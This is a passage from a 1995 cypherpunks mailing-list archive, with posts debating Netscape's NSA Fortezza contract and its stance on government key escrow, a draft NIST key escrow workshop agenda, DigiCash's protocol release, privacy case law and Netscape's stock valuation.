In-Reply-To: <951201073154.60201e3d@mitlns.mit.edu>
Message-ID: <30C000A3.E0E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Bob Bruen, MIT Lab for Nuclear Science wrote:
> 
>   The following came from a government source. I thought it might be of
>   interest.
>                        Bob
> --------------------------------------------------------------------------
> 
>      At yesterdays FNC  (Federal Networking Council) meeting it was
>      mentioned in passing that NSA has given Netscape a grant of $5 Million
>      (yes $5M) to beef up the security features of Netscape. More info will
>      be forthcoming on this.

  This is not strictly true.  The NSA has given us a contract to add
support for Fortezza to some of our products, including servers and
navigators.  The amount was less than $5M, but I'm not sure that I
should say how much it was.

  One of the things we hope to get out of this work is an architecture
for our products that allows us to easily support other crypto hardware,
including devices that don't use Secret algorithms, and don't require
key-escrow.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 1995 17:50:08 +0800
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <199512011556.HAA08776@blob.best.net>
Message-ID: <30C006E4.D39@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 03:01 AM 12/1/95 -0800, Timothy C. May wrote:
> >I hope the media types reading now will attend the December 5th (I
> >think...details should be available) gathering on "key escrow" in
> >Washington. D.C. This should be a fiery meeting, especially if the Netscape
> >reps (I assume someone from Netscape will be attending, given their central
> >role in the all-important Web world) either denounce GAK or support GAK.
> 
> I will prepare the netscape dehanced dirty pictures web page,
> but not advertize the URL until shortly after December 5th.
> 
> I hope to hear a suitable "clarification" before then.

  See my recent message to this list.  We will be taking an anti-GAK
position.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 2 Dec 1995 09:10:26 +0800
To: cypherpunks@toad.com
Subject: Draft agenda for 12/5 Key Escrow Workshop
Message-ID: <199512012315.AAA14620@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



To:  Key Escrow Distribution List

From:  Ed Roback, NIST

Subject:  Tent. Agenda for 12/5 Meeting

Following for your information is the tentative agenda for the  
meeting next Tuesday.

Attachment

---------------------

D R A F T

Proposed 64-bit Software Key Escrow
Encryption Export Criteria Meeting

Red Auditorium
National Institute of Standards and Technology

December 5, 1995


9:00        Welcome
              Ed Roback, NIST


9:10        Perspectives, Objectives of Criteria, and Future 
Plans
              Michael Nelson, Co-Chairman
              Interagency Working Group on
                     Encryption and Telecommunications (IWG/ET)


9:30        Exportability Criteria Discussion
              Clint Brooks
              National Security Agency


10:45         Break


11:00      Draft Key Escrow Agent Characteristics
              Geoff Greiveldinger
              U.S. Department of Justice


12:00      Lunch (on your own, NIST cafeteria available)


1:00       Industry Perspectives

              Bill Sweet & Ken Mendelson, TIS
              Dorothy Denning, Georgetown University
              Melanie Janin, U.S. Council for International     
                       Business
              Ed Scheidt, Tecsec
              Jerry Berman & Daniel Weitzner,
                     Center for Democracy and Technology
              Paul Lambert, Oracle
              David Sobol, Electronic Privacy Information 
Center
              Padgett Petersen, Lockheed-Martin
              Robert Holleyman, Business Software Alliance
              Alex McIntosh, PC Security Limited (UK)
              Doug Miller, Software Publishers Association
              (time permitting:)
              Randy Sabett, Spyrus
              Shabir Safdar, Voters Telecommunications Watch
              Viktor Hampel, Hampel Consulting


2:30       Break


2:45       Cont. (as necessary)


3:45       Wrapup & Adjourn
              Ed Appel, Co-Chairman, IWG/ET


*****************************************************  

Elaine Frye
Computer Security Division
National Institute of Standards and Technology  
Bldg. 820, M.S. Room 426
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1233

*****************************************************


[Note that the planned breakout sessions originally appear
to have been axed, and the meet has dwindled to a vent for 
industry reps who've already publicized their positions. 
Now watch brute key escrow spread covertly for "public 
security."]








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 2 Dec 1995 13:47:10 +0800
To: cypherpunks@toad.com
Subject: No Privacy Right in UK ? - Part 3
Message-ID: <Pine.BSD.3.91.951202002414.10211B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
             
Friend, 
 
 
A 12 01 95 The Electronic Telegraph newsstory headlined 
 
         Policeman bugs own station by mistake 
 
reports: 
 
   ...a listening device was found at the headquarters of 
   Lothian and Borders Police in Edinburgh. 
 
   The "bug", disguised to look like a plug adaptor, picked up 
   the day-to-day business of the operations room, including 
   radio and telephone messages and conservations between 
   staff. 
 
Conservations between staff?  Conversations in which not a 
word is wasted? 
 
   Its presence was discovered when staff in a rest area tried 
   to tune a radio to a different station and picked up the voices 
   of their colleagues. 
 
I used to despise those who couldn't keep their hands off the 
dial for 5 minutes, but since reading this story my attitude's 
been adjusted. 
 
   Concerned that secrets were being transmitted abroad, the 
   force "swept" the control room with anti-bugging technology, 
   only to find that the device belonged to them. 
 
   It had been "planted" by an officer who thought it was a real 
   adaptor. 
 
 
Of course I believe that! 
 
For what comes around...goes around. 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The Electronic Telegraph website's URL: 
 
       http://www.telegraph.co.uk 
 
       The newsstory's by: 
 
       AUSLAN CRAMB, SCOTTISH CORRESPONDENT 
 
       Its online filename: 1bugs01.html 
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 2 Dec 1995 13:55:31 +0800
To: support@marktwain.com
Subject: Re: DigiCash releases protocol specs!
Message-ID: <01HYB9JVY8VG8WZ1OE@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"support@marktwain.com"  1-DEC-1995 18:56:11.57

By popular request, DigiCash is releasing the protocol specs.

The specs are available at 
http://www.digicash.com/ecash/protocol.html

Please be aware that the doccument is work in progess. More 
specifications, including byte level descriptions of the message 
format will be added throughout the weekend.

--Lucky Green at
----------------------
	Thank you. This raises my likelhood of using DigiCash's electronic
currency from about none to above that.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 13:57:24 +0800
To: unicorn@polaris.mindport.net (Black Unicorn)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.SUN.3.91.951202031812.18919B-100000@polaris.mindport.net>
Message-ID: <199512020833.AAA09396@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So, for a 15% reduction in salary and 30 days of job search, is it worth it?

	30 days? in silicon valley? you *must* be joking. (i suppose
the market for good net-folks isn't as big over on the right coast.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 1995 22:34:03 +0800
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C006E4.D39@netscape.com>
Message-ID: <30C016E6.6264@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Fri, 1 Dec 1995, Jeff Weinstein wrote:
> 
> > James A. Donald wrote:
> > >
> > > I will prepare the netscape dehanced dirty pictures web page,
> > > but not advertize the URL until shortly after December 5th.
> > >
> > > I hope to hear a suitable "clarification" before then.
> >
> >   See my recent message to this list.  We will be taking an anti-GAK
> > position.
> 
> So you will refuse to implement GAK in future version of netscape then?
> Or you will merely do lipservice to the GAK policies at the conference?
> 
> I think the distinction is quite key.

  If the law requires GAK, then I believe that we will implement it rather
than just disable encryption.  We are taking a position against GAK and
will continue to lobby against it.  We are planning to continue to do both
US and Export versions, so I don't think that the government's ploy of
trying to lure companies into weakening their domestic versions will work.
We released a 128-bit version of our product almost a year ago, at a
time when many companies were providing only weak crypto in their domestic
products so that they didn't have to trouble themselves with two versions.
We are actively lobbying in washington to get clarification of the
current regulations so that we can provide the US version via an "export
controlled" FTP or HTTP download.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 3 Dec 1995 05:57:10 +0800
To: Herb Sutter <herbs@interlog.com>
Subject: Re: [NOISE] Barring access to Netscape
Message-ID: <v02130501ace58f7111d6@[165.254.158.210]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:41 12/1/95, Herb Sutter wrote:

>At 14:26 12.01.1995 -0500, Robert A. Rosenberg wrote:
>>If you want to see one way of locking out Netscape users, check out this
>>URL which points at a Web Page that will not allow access by Netscape Users
>
>Just a personal note... while I am strongly in favour of security, this
>seems rather petulant and knee-jerkish.
>
>JeffW: Please add a configuration option to let users override the "Mozilla"
>ident, so that they can continue to use Netscape at all sites.  I personally
>won't use the override, though; if a site is going to insist on trying to
>frivolously exlude me as a user based on nothing but the browser I choose to
>use, they aren't serious anyway.
>
>>(the guy is ticked off at them trying to establish their own standards) -
>
>The _market_ establishes standards (been proven time and time again).  His
>reaction sounds pretty childish to me, but YMMV...
>
>Herb

I am not advocating his gripe (or the security question) - My message was
posted to provide an example of how to treat Netscape users special by
locking them out IF you have a need/desire to do so (which was what was
being requested).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 2 Dec 1995 23:23:48 +0800
To: cypherpunks@toad.com
Subject: Re: John Gage's comments at Computer Security Day in Cleveland
Message-ID: <199512021022.CAA21819@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Dr. Frederick B. Cohen wrote:

> John Gave gave an interesting pitch for Java at the CSSI Computer
> Security Day sessions in Cl;evelan yesterday (November 30).  Among
> his comments were:
> 
> 	Java is not secure - it is "safe"

No comment.

> 	He (John Gage) regularly downloads binary executables from the
> 	Internet and runs them on his workstation at Sun - (connected to
> 	the internal Sun network).

He downloads executables and runs them while connected to ...

Oops, ... no comment.

> 	Sun has terrible physical security - unknown people roam the halls
> 	at night all by themselves.

How do they get in the building in the first place??  Someone should 
think about a MEMBERS ONLY sign or something ...

Oops, ... no comment.

> 	In 2 years, you will be able to buy a computer that does more than
> 	a Sparc now does, in a portable package the size of a cell
> 	phone, with more than 30 million bits per second of mobile
> 	bandwidth direct to the Internet, for less than $30.

Now this last one could not pass without a deserved comment.

How will John have my fingers connect with the cell-phone sized keyboard?? 
I guess for LESS than $30, I probably shouldn't be moaning and
complaining, though ... especially if its energy-star compliant.

> -> See: Info-Sec Heaven at URL http://all.net/
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

Dr. Fred, as usual ... you're a hoot.  

Your timing is great.  And as luck would have it, I've got a Sun open
house to go to this Monday for their pre-Christmas shin-dig.  The
President of Sun Canada, (I think) is supposed to be in attendance. 

You just gave me some great material to goad him with.  Thanks.

Even though these social things aren't usually for shop-talk, I think I
might just save some of this stuff for use at the punch bowl. 

(Naah, I wouldn't do that.)-;  

But it is great material ... and perfect timing ... 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 2 Dec 1995 16:24:21 +0800
To: JR@ns.cnb.uam.es
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <951201140557.20a03b98@ROCK.CNB.UAM.ES>
Message-ID: <Pine.SUN.3.91.951202023919.18919A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995 JR@ns.cnb.uam.es wrote:

> From:	SMTP%"tcmay@got.net"  1-DEC-1995 12:26:55.99

> >First, a viable strategy is to simply do nothing. Ignore the goverment's
> >protestations, drag one's feet, shrug, etc. Jim Clark could simply have
> >said nothing. (Recall that Bill Gates came out recently saying that strong
> >encryption is inevitable...Clark could have either said nothing, or said
> >something similar to what Gates said.)
> 
> 	That may be a very bad move from their point of view. If the Gov.
> pushes hard, and it is an important customer, it is in their interest
> to satisfy them. As long as anyone else wants to follow the Gov. it is
> also good for them to follow those lines, and to be the firsts ones.
> 
> 	What about foreign customers? If the Gov. can restrict export of
> your technologies, they'll move to other providers. It is better for
> you to pay hommage to the Gov. requests and get to overseas markets
> faster and sooner than anyone else.

You need to think real hard about how likely foreign customers on a scale 
as large as the U.S. government are going to be attracted to a product 
that forfeits its keys to the U.S. government.  Consider this problem 
again in light of all the hand waving about the U.S. intelligence 
agencies and industrial espionage/intelligence.

> 
> >Second, the issue is not "satisfying" a "bunch of cypherpunks." If Netscape
> >truly pushes for GAK, and people reject GAK and Netscape, then this will
> >surely hurt shareholder value. (Frankly, I expect one or more stories to
> >appear in the next few days about the budding "Friends Don't Let Friends
> >Use Netscape" and "Just Say No to Netscape" movements. Whether this will
> >hurt the stock is unclear.)
> 
> 	The "just say no" movement is OK as long as you don't append
> "to XXX". It could work if it is only Netscape... But as soon as anyone
> else gives in (e.g. Microsoft) it will become a burden. It's much better
> IMHO to ask "say yes to privacy". It's much better to say "this page is
> optimized for good safety and may not be reliable under non-crypto
> browsers -e.g. Netscape-" than saying "your browser is bad". Which
> BTW, may be OK in the USA, but is not in other places. Belgium comes
> to mind for forbidding negative advertising. And surely others. 

And most of those laws apply only to other members of the market, not 
"public safety" announcements by private or not-for-profit organizations.

It infuriates me to turn this into a question of hand wringing over 
exactly HOW to say that your keys will be turned over to the nearest 
government agency and that the product, from a security standpoint, is 
simply unacceptable.  I suppose we could call it "security challenged" 
but I think that a bit silly, don't you?

Then again, we wouldn't want to hurt anyone's feelings.

If you can't say anything nice, then key forfeiture obviously sucks.

> 
> >I say that the ideas being discussed are in fact "constructive" ideas.  I
> >won't reiterate them all here, but they clearly involve concrete action
> >(e.g., modifying server software to issue warnings to Netscape users, or
> >encouragement of alternatives to Netscape).
> 
> 	Some of them are. Others are not. Others are destructive (like
> denying access to Netscape users), or unpracticable (like saying "Mozilla
> is not the best thing" in some places), or unrealistic (like saying "quit
> your job"), or plain silly.

Let's put this example in a more personal context, with you as the 
netscape guru.  In fact, let us carry that assumption along, as really 
I'm talking to the netscape insiders to begin with.

It's silly or unrealistic only because your views on the subject are 
obviously worth less than the salary cut you would take for quitting.  
In fact, the fact that it is silly or unreasonable at all for you to 
resign is totally based on your assessment of what the spread of strong 
crypto and the opposition to key forfeiture is worth.  You have made that 
decision, but don't call hopeful prodding unrealistic unless you include 
the statement 'key forfeiture is simply not worth enough for me to endure 
the risk and likely salary cut I will have to face if I oppose it strongly.'

> 	If you deny access to a user, you'll make him/her angry. And not
> angry with Netscape. They'll be angry with you. We need people on our
> side. That's basic psicology. I'd go for more pages explaining what
> crypto is and can do for Joe Random.

Your faith in Joe Random vastly exceeds mine.

> 	Many people has said "I can do this or that with my server or
> whatever". How many people is offering an alternate safe crypto service 
> and making it interesting and desirable for Joe Random? And making it 
> well known? I'd say that not enough. 

And one less now that Netscape has taken this position, yes.  Shuffling 
the blame off on everyone else is a fine thing to do unless you are 
sitting on top of a hunk of cash, a lot of influence, and a foot into the 
market.  You have the chance here to do a lot of good, rather than cave 
in and suckle off the teat of your local authority figure.  Then again, 
your money is in your pocket, and we have well estlablished exactly what 
strong crypto is worth to you.

> 	If you can offer an attractive service, protected with another
> crypto method, and make it popular, people will demand it. If you just
> add a note saying you use that crypto 'cos Government-enforced crypto is
> not good enough, people will feel happy and will learn.

Again, your faith in Joe Random is excessive.  NETSCAPE has a position of 
power at the moment, and could easily energize the issue and educate a 
lot more stockholders by taking a stand than by caving in.  If your 
concern is education, netscape press releases and political positions are 
much more potent in that regard than cypherpunks mailing lists.

Your information cost is lower by a factor of 100 or more.  Putting the 
burden on our shoulders, and then couching it in terms of the cypherpunks 
being negative, when indeed we are merely pointing out to whoever will 
listen that a spineless money decision has been made, is the center of 
hyprocracy.  It sickens me.

> 	In general, people prefers positive presentations to complains
> or problems. Have a look at TV ads. How many of them say "Don't use
> that stuff, it's shit" instead of "Use my stuff, it's better".

As does this psycho-babble trash.

> 	That's what I advocate: a positive course of action, offering
> a better alternative. Not just a storm of complains or "bad karma".

So when pinto's explode, I might as well just advertize hondas as a 
'better value' and not mention the rather glaring fault in the competing 
product?

I might add, few cypherpunks (to their great credit) sell their 
software.  We are interested in the software being the strongest, and 
best quality.

Freeware has that effect, it clairifies the issue.  No longer is hype or 
advertizing an issue.  It is merely quality, and peer review, elements 
which Netscape has completely missed the target (and the barn) on from 
the beginning.

> >What more are you expecting? Have you been reading what people are actually
> >discussing doing and actually already doing?
> >
> 	Yes, I've read all along. As I hope will be more clear now. And
> I have found lots of people saying "I won't support Netscape", "I will
> say no", "I will deny access to Netscape", "I'll add a complain to my
> page", "Jim should retract", "Netscape should go back", "Netscape better
> changes its money-making policy and becomes a political activist", 
> "This or that guy must quit job"...
> 
> 	What I was expecting is people to be more realistic, not to forget
> that the main goal of a company is to make money instead of defending public
> freedom (which indeed is bad for business), and start promoting better (or
> not) alternatives.

You mean to realize that Netscape could care less about the 'educated' 
consumer who is displeased with the decision, and instead is following 
that large nose which sniffs the waifting scent of green?

Look, I am as much for free market as anyone else.  That's fine.  Don't, 
however, tell anyone not to complain because this or that company is only 
in it for the money.  Some people vote with their feet.

I sold the lot of my netscape shares.  I did just fine, and I will sleep 
better at night.  SOME cypherpunks do buy stock.  Some of us put a great 
deal of money into the market in fact.  Some of us are interested in 
promoting companies that further our LONG term interests as well as short term 
interests.  If you would happen to look at the long term, you might 
discover that there is more money in it for Netscape, and everyone else, 
if strong crypto is not restricted.  Unfortuantely, like most Joe 
Randoms, and most Joe Random Inc.'s, long term for you is when the 
restricted sell of your stock options expire.

Either support GAK or do not.  Don't give us horseshit about how you 
think we are being too hard on Netscape because we are educated 
consumers, and because we realize that GAK crypto is not the best product it 
could be.

It is as much our right to gripe and moan about the spineless decision as 
it is for you to make it.  To tell us to ignore it is hypocritical in the 
extreme.  If your product is so superior, why the hell should you care 
about a few cypherpunks moaning about this or that?  Aren't we members of 
the free market as well?  Who are you to tell us that our decision to 
promote or to denounce netscape is based on the wrong criteria?  The 
entire point of the free market is to hear and support those concerns in 
the proportionate levels and with the respective influences that they wield.

Take your emotional censorship elsewhere.  And while your at it, try 
making a superior product to please us, rather than some high-school 
textbook psycho-babble about saying only nice things to the other 
children in the sandbox.

> 	And, to finish, note that I have also seen some very good answers,
> on which I don't coment since I agree and have little to add to.
>
> >--Tim May
> >
> 				jr


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 2 Dec 1995 16:48:32 +0800
To: Sten Drescher <dreschs@mpd.tandem.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512011629.KAA28071@galil.austnsc.tandem.com>
Message-ID: <Pine.SUN.3.91.951202031812.18919B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Sten Drescher wrote:

> Matt Miszewski <crypto@midex.com> said:
> 
> MM> On Thu, 30 Nov 1995, sameer wrote:
> 
> s> Jeff: If Netscape comes out in favor of GAK, will you leave?  (Wait
> s> until February, at least, of course..) You don't have to answer that
> s> to me, or the list, just think about it, and answer it for yourself.
> s> Do you think "anyone else" there would leave, as you say below that
> s> they don't want to go down history, etc...
> 
> MM> While this would go over well in the press if handled right please
> MM> let everyone remember that Jeff is a real person with bills to pay
> MM> and food to put on at least his own table.
> 
> 	I believe that was the point: How many people at Netscape would
> put principled opposition to GAK ahead of expediency?  My guess?  Not
> enough.
> 

And more importantly, what exactly is the GAK issue worth to netscape 
types?  Don't spout that trash about not being able to put food on the 
table.  Salary cut, maybe, temporary job search, maybe, but poverty?  I 
hardly think so.

So, for a 15% reduction in salary and 30 days of job search, is it worth it?

Answer for yourself.  That's where you really stand.


> -- 
> #include <disclaimer.h>				/* Sten Drescher */
> To get my PGP public key, send me email with your public key and
> 	Subject: PGP key exchange
> Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 2 Dec 1995 16:48:15 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.BSF.3.91.951201171025.28141A-100000@mercury.thepoint.net>
Message-ID: <Pine.SUN.3.91.951202032514.18919C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Brian Davis wrote:

> On Fri, 1 Dec 1995, Jonathan Zamick wrote:
> 
> > Hmm. The key point is that almost no general users will have a clue what
> > actual security is, and what GAK is. They _might_ understand the risks of
> > having an explosive in their vehicle (but can just as easily argue it wasn't
> 
> > properly designed if it went off improperly.) Regardless of what they'd know
> > about their vehicle, they can easily claim to had the risks associated with
> > GAK improperly represented, Netscape misleading them with deceptive claims
> > of security given this potential hole etc.
> 
> And thus we return to my original point, which is that it will depend on 
> what is said/disclosed.  If every copy of GAKscape had a banner, bigger 
> than the Netscape "N" which said, "The government can read every message 
> you send using this software no matter what you do" then I think 
> consumers will be hard pressed to say they weren't warned.

One might want to consider the effect of _Smith v. Maryland_, 442 U.S. 
735 (1979) - As described in _California v. Greenwood_, 486 U.S. 35 
(1988).  "We held in Smith v. Maryland, for example, that the police did 
not violate the Fourth Amendment by causing a pen register to be 
installed at the telephone company's offices to record the telephone 
numbers dialed by the suspect (without a warrant).  An individual has no 
legitimate expectation of privacy in the numbers dialed on his telephone, 
we reasoned, because he voluntarily conveys those numbers to the 
telephone company when he uses the telephone.  Again, we observed that "a 
person has no legitimate expectation of privacy in information he 
voluntarily turns over to third parties.

or to rephrase in the likely implementation:

An individual has no legitimate expectation of privacy in the encryption 
numbers in his GAK browser, we reasoned, because he voluntarily conveyed 
those numbers to the government when he purchased the software.

> > 
> > I'm not saying whether or not this is the case, but we are very much in a
> > legal period where individuals are in fact expected not to need common sense,
> > and corporations are responsible for cleaning up after consumer stupidity.

I would say the above indicates that infact a lot more than common sense 
is needed to try and assure privacy.  It would seem that when it comes to 
privacy, you have to be a phone techie or in this case, a crypto techie, 
to expect to be protected.

> > 
> > It is certainly true that given the general state of education regarding
> > crypto, the average consumer can easily say that regardless of warnings about
> > GAK, that they weren't properly informed of the risk. With all the hype
> > around security, Netscape and encryption people will be under the
> > impression regardless
> > of one little disclaimer tag, that their information is safe. Neither
> > government nor corporations will disabuse them of this belief. The case
> > would be strong against them as a consumer.

In fact it would seem that there is almost a burden imposed on the user 
to determine who and what gets the information of the software should he 
or she want to be protected by the constitution.

> I disagree.  Almost nobody read the fine print on the back of a note you 
> sign when you buy a car or otherwise take out a loan, but the provisions 
> are generally enforceable ...  Ignorance is not necessarily an excuse.

Actually, I was under the impression that adherance contracts like that 
(the most oft touted example is the ski lift ticket with four paragraphs 
on the back) are often tossed out when it has to do with liability on 
that order.  The reason loan agreements are not often thrown out is 
because courts find an increased expectation that the consumer would be 
paying attention to the back of loan documents than the back of a ski 
lift ticket.  I think it will be unlikely that warnings on the box of a 
given piece of software will suffice.  Large banners in the program 
itself may meet the threshold.

If there is enough interest, I will research the threshold issue.

> > Jonathan
> > 
> > ------------------------------------------------------------------------
> > ..Jonathan Zamick                    Consensus Development Corporation..

> 
> Not a lawyer on the Net, although I play one in real life.
> **********************************************************
> Flame away! I get treated worse in person every day!!



---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 13:57:30 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C006E4.D39@netscape.com>
Message-ID: <Pine.SUN.3.91.951202034905.18919D-100000-100000-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Jeff Weinstein wrote:

> James A. Donald wrote:
> > 
> > I will prepare the netscape dehanced dirty pictures web page,
> > but not advertize the URL until shortly after December 5th.
> > 
> > I hope to hear a suitable "clarification" before then.
> 
>   See my recent message to this list.  We will be taking an anti-GAK
> position.

So you will refuse to implement GAK in future version of netscape then?  
Or you will merely do lipservice to the GAK policies at the conference?

I think the distinction is quite key.

Forgive the pun.

> 	--Jeff
 -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 2 Dec 1995 21:41:19 +0800
To: cypherpunks@toad.com
Subject: Re: Talking to Jim
Message-ID: <199512021324.FAA15861@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, PeterWiltshire wrote:

> Gidday all
> 
> I emailed Jim Clark day before yesterday about his comments re key escrow.

Uhhm, what is his email address??  

I'd love to ask him one or two questions, not just about key escrow, but
about Netscape's future prospects and its current stock valuation. 

(Netscape now has a market capitalization larger than Apple Computer.)

> He responded.  As it's not good form to post private email, might I suggest
> that one of the 'elders' here put to Jim a list of questions on the proviso
> that his answers can be posted to the list.  You never know, a lot of
> speculation might be confirmed or denied.

I've got some questions ...

Mathew Ingram, reported in the Investment Reporter that Jim has stock
holdings currently worth more than $1 Billion in Netscape, and yet Jim was
quoted as saying at a recent technology conference "you could argue
there's something of an Internet bubble developing."  The article also
quoted him as saying that if Netscape made a profit in the next year or
two it would only be "because we miscalculated." 

Miscalculated??  I'll say.

If he thinks that GAK will go down with great support, when they want to
split their stock, then they're really not quite aware of the mind of the
organization that they'll be up against. 

I wonder what people will have to say about Netscape, then. 

Right now, brokerage firm Hambrecht & Quist is estimating that in five
years the Internet will be a $23 Billion market -- equal to the size of
the _entire_ software industry today.  And a money manager at Franklin
Resources Inc. said, "some people are suggesting the big tech company in
the next century could be Netscape." 

Personally, I don't think so.  But then who am I??

Goldman Sachs just put Netscape on its "recommended" list.  And some
analyst called Michael Parekh was quoted as saying that Netscape could hit
$200 in the next two years.  That it was going to be the Microsoft of the
Internet -- dominating the software side of the World Wide Web.

I wonder if Parekh's valuation is a pre or post stock split evaluation. 

Shoot, if Parekh is talking about $200 post-split ... then Netscape could
well become a really big league play in this game far sooner than most
people think.  I'd love to hear how this fits with Jim's words of a
"bubble". 

The market seems to "think" that it's a better present judge of what
Netscape has than he does.  It's almost as though the "market" has
developed a "mind" of its own.  It's own particular neural network.  It
doesn't seem like the market is paying attention to any of Jim's warnings
or words.  His "opinion" -- like all corporate officers opinions are
strongly discounted and very lightly weighted. 

It's almost as though there is automated software at work. 

Some people might think about going short against the box on this one.  

Although the article talked about a short "squeeze" which would generally
mean that this stock is going to go nowhere but up as the short sellers
try to cover, personally, I might start to take some money off the table
and not add anything to my position.  But all this depends on the depth of
someone's pockets, I guess.  And on some serious trading analysis. 

Then again, there is that old adage about never fighting the tape.  It's 
compared frequently to whizzing into the wind, I think.  Probabilities 
and such.

(Disclaimer:  This is not intended as and should not be considerred as
investment advice ... or for that matter as whizzing advice, either.)

I'd love to hear Jim talk some more about this. 

For me, all of this Netscape stuff is getting way too surreal.  It seems
really strange.  Some people are arguing that things are getting out of
hand, and yet it seems like this one is completely out of Jim's control. 

No one is listening to ANYTHING from Netscape at all.  The market is
simply listening to its own internal dialogue.  And that certainly is a
surprise to this writer.  It's a surprise to me, and it's probably a
surprise to Netscape.  Finance 501 is more complex than Finance 101. 

Maybe they should read up about the privatization of BP and the
involvement of the KIO.  Or learn a bit about Li Ka-Shing, or something
which adds to their knowledge base.  That might give some idea about what
is actually going on here. 

(Not that the Kuwaiti Investment Office or Li-Ka Shing has an interest in
this one.)



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 2 Dec 1995 21:26:48 +0800
